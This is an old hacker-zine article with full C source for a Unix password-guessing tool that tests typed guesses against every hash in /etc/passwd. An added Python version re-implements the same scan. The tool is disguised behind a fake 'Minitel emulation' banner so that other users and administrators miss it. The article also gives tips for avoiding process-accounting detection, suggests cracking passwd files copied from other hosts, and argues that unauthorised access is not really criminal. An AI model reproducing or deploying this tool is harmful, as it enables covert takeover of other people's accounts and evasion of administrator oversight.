UNIX Password Hacker
An Alternative Approach
by Keyboard Jockey
If you've been trying to hack UNIX for a while, I'm sure you've run into some form of a password hacker. Most of these do the job, but I tend to avoid using them. They use too much CPU time and are usually easy to spot. In this article I will show you an alternative way of password hacking, using the same method as most others, but with a different approach.
In order for this program to work, check your /etc/passwd. Each line holds one account: the username, a colon, the encrypted password, and then the rest of the account information (UID, GID, comment, home directory, shell), all separated by colons. If the password field contains a *, that account cannot be logged into: a * can never appear in a genuine crypt() hash, so it is there as a lock marker. If the field is very short, like a single x, the system is using shadow passwords: the real hashes live in a file you can't read, and the data in the /etc/passwd password field is not valid. Hopefully the field holds real hashes (13 characters on a classic crypt() system), or else this program will not work on it.
First, type in the source code, and then compile it. If you're having problems with compiling, make sure you typed it in correctly. If you're not sure about your compiler, look at the manual page for cc, the C compiler (man cc). After that, execute it and you will see:
Minitel emulation package V3.0
(C)opyright 1985-1990

Do you need relaxed protocol? (for networks)

At this point, you should enter: 800
The decoy prompt is there so that anyone else who runs the binary won't realize it is a password hacker: you might forget to take away execute permission for others, or a superuser might be snooping around. Anyone who answers with anything other than 800 gets a fake error message and the program exits. Either way, it is safer with the decoy than without it.
After entering 800, you will see Connect to what host?
It is actually asking you to enter a password guess. It will then take a few seconds and run that guess against every entry in /etc/passwd, encrypting it with each account's salt and comparing the result to the stored hash. If anyone's password matches, you'll see the username on the screen. The first time you run it, test it by entering your own password and check that your username shows up. It keeps asking for passwords until you press Enter on an empty line.
Something you might want to do is to modify this program or make your own. If you're going to make your own, look at the last few lines, where it uses the crypt() library call. If you're going to modify mine, you might want to make it read an external file instead of /etc/passwd, so you can hack accounts from a passwd file copied off another host. Most other scanners try every word in a dictionary file, so their CPU usage is high and continuous. With this one there is a brief burst of CPU usage (the scan of /etc/passwd) followed by idle time while you type your next attempt. Keep in mind that some systems run process accounting, which records how much CPU time you use and which program used it, and may also log how often you use Telnet.
When you're guessing at people's passwords, remember the password policy on your system. Some systems require a minimum of six characters and reject passwords that appear in the dictionary. So don't waste time entering something like cpu when three-character passwords aren't allowed. It will take a while to get an account. After all, it is you who is guessing the passwords now. The advantage is that it is hard to detect. The disadvantage is that it takes up your time, not the computer's.
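The three things the text above has you do by hand and by eye (decide whether a password field is a real hash, run one guess against every account, and skip guesses the password policy would never have allowed) are written out below as one small program. This is an added example, not Keyboard Jockey's code. Everything in it is an assumption for illustration: the function names, the constructed /etc/passwd excerpt, and toy_crypt, which stands in for crypt(3) so the example runs without a crypt library. toy_crypt keeps the one property the method depends on, that the first two characters of the stored hash are the salt and the function returns salt plus hash, so on a real system you could pass Python's crypt.crypt (present through 3.12) or call C's crypt() in its place with no other change.

```python
"""Added example: the scanning method of the article as reusable functions.
Not the original program. toy_crypt is a stand-in for crypt(3), and
SAMPLE_PASSWD is a constructed /etc/passwd excerpt (both are assumptions).
"""
import hashlib
from typing import Callable, Iterator, List, Tuple

CryptFn = Callable[[str, str], str]


def toy_crypt(guess: str, setting: str) -> str:
    """Stand-in for crypt(3). NOT the real DES algorithm (assumption).
    Like crypt(), it takes the first two characters of `setting` as the salt
    and returns salt + hash, so crypt(guess, stored) == stored is the test.
    """
    salt = setting[:2]
    digest = hashlib.sha256((salt + guess).encode()).hexdigest()[:11]
    return salt + digest          # 13 characters, like classic crypt() output


def field_status(pw_field: str) -> str:
    """The by-eye check from the article, as code.
    empty  : no password at all
    locked : contains '*', which cannot occur in a real hash; account can't log in
    shadow : short placeholder such as 'x'; real hash is in a file you can't read
    hash   : looks like real crypt() output and is worth scanning
    """
    if pw_field == "":
        return "empty"
    if "*" in pw_field:
        return "locked"
    if len(pw_field) < 13:
        return "shadow"
    return "hash"


def parse_passwd(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (username, password field) for each well-formed passwd line."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:          # name:passwd:uid:gid:gecos:dir:shell
            continue
        yield fields[0], fields[1]


def scan_passwd(text: str, guess: str, crypt_fn: CryptFn = toy_crypt,
                min_len: int = 0) -> List[str]:
    """One pass over the file for one guess, like the getpwent() loop.
    min_len implements the advice not to try guesses the policy forbids."""
    if len(guess) < min_len:
        return []
    hits = []
    for name, pw in parse_passwd(text):
        if field_status(pw) != "hash":
            continue                  # nothing to compare against
        if crypt_fn(guess, pw) == pw:  # stored hash doubles as the salt
            hits.append(name)
    return hits


def make_sample() -> str:
    """Constructed /etc/passwd (assumption). Hashes come from toy_crypt so the
    demo is self-consistent: kj and bob both use 'secret' (different salts,
    so different hashes), alice uses 'hunter2'; root is locked, daemon is
    shadowed and guest has an empty password field."""
    rows = [
        ("root", "*", 0, 0, "Superuser", "/", "/bin/sh"),
        ("daemon", "x", 1, 1, "System daemon", "/", "/bin/false"),
        ("guest", "", 500, 100, "Guest account", "/home/guest", "/bin/sh"),
        ("kj", toy_crypt("secret", "Ab"), 1001, 100, "Keyboard Jockey", "/home/kj", "/bin/csh"),
        ("alice", toy_crypt("hunter2", "Zq"), 1002, 100, "Alice", "/home/alice", "/bin/sh"),
        ("bob", toy_crypt("secret", "9/"), 1003, 100, "Bob", "/home/bob", "/bin/ksh"),
    ]
    return "\n".join(":".join(str(f) for f in row) for row in rows) + "\n"


SAMPLE_PASSWD = make_sample()

if __name__ == "__main__":
    # Same interactive loop as the article: one guess per line, blank line quits.
    import sys
    for line in sys.stdin:
        guess = line.rstrip("\n")
        if not guess:
            break
        for name in scan_passwd(SAMPLE_PASSWD, guess, min_len=6):
            print(name)
```

Feeding it the guess "secret" prints kj and bob, one scan of the file for one guess; the locked, shadowed and empty entries are never passed to the hash function at all, which is the same reason the original program has nothing to find on a shadowed system.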
If you're looking for more information about UNIX structures, try the man pages or buy the book Using C on the UNIX System from O'Reilly & Associates, Inc. You can get a catalog of their books by requesting one from nuts@ora.uu.net, at uunet!ora!nuts, or at O'Reilly & Associates, Inc., 981 Chestnut Street, Newton, MA 02164.
Now that you have enough knowledge to use this program, I'll end this article with some interesting questions and beliefs.
I think hacking is the use of creativity and knowledge to obtain a goal. After all, if you're just using cookbook methods (like this program), then you're not really hacking. If you have an account or a code but you don't understand how it was taken, then you didn't hack it. Also, if you didn't destroy or pirate anything, why does the law consider you a criminal? After all, most legal users of a system waste resources too. Does it really matter if the CPU time was taken by Mr. Hacker, the guy who uses accounts to look around and hang up, or by Joe Blow, the guy who uses the same amount of CPU time to download new public domain games for his personal computer from another host?
And one last note, have people really been using viruses to hack? Have people been using their skills to destroy the host after they've hacked it? That is the impression I got from Good Morning America on ABC when they interviewed a former LOD/H member. The only good example I can think of is Robert T. Morris, but his virus/worm was never meant to be destructive.
/* Alternative UNIX Password Hacker
   Written by Keyboard Jockey */

#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>
#include <unistd.h>     /* sleep() */
#include <pwd.h>        /* struct passwd, setpwent(), getpwent(), endpwent() */

/* crypt(3); on most current systems link with -lcrypt. */
char *crypt(const char *key, const char *setting);

/* Read one line from stdin into buf and drop the newline.
   Replaces gets(), which has no bounds check and is gone from modern C. */
static void readline(char *buf, int size)
{
    if (fgets(buf, size, stdin) == NULL)
        buf[0] = '\0';
    buf[strcspn(buf, "\n")] = '\0';
}

int main(void)
{
    struct passwd *p1;
    char passw[80], thing[80];

    /* Decoy banner: anyone looking over your shoulder sees a terminal emulator. */
    printf("\n\nMinitel emulation package V3.0\n");
    printf("(C)opyright 1985-1990\n\n");
    printf("Do you need relaxed protocol? (for networks) ");
    readline(thing, sizeof thing);
    if (strcmp(thing, "800") != 0) {            /* 800 is the real answer */
        sleep(1);
        printf("\nCan't find minitel data files.\n");
        exit(1);
    }

    for (;;) {
        setpwent();                             /* rewind /etc/passwd for each guess */
        printf("\nConnect to what host? ");     /* really: enter a password guess */
        readline(passw, sizeof passw);
        if (strlen(passw) == 0)                 /* empty line ends the session */
            break;
        /* Try the guess against every account. crypt() reads its salt from
           the stored hash, so an equal result means this user has that password. */
        while ((p1 = getpwent()) != NULL) {
            char *pw = crypt(passw, p1->pw_passwd);
            if (pw != NULL && strcmp(pw, p1->pw_passwd) == 0)
                printf("%s\n", p1->pw_name);
        }
    }
    endpwent();
    return 0;
}
Code: alternate.c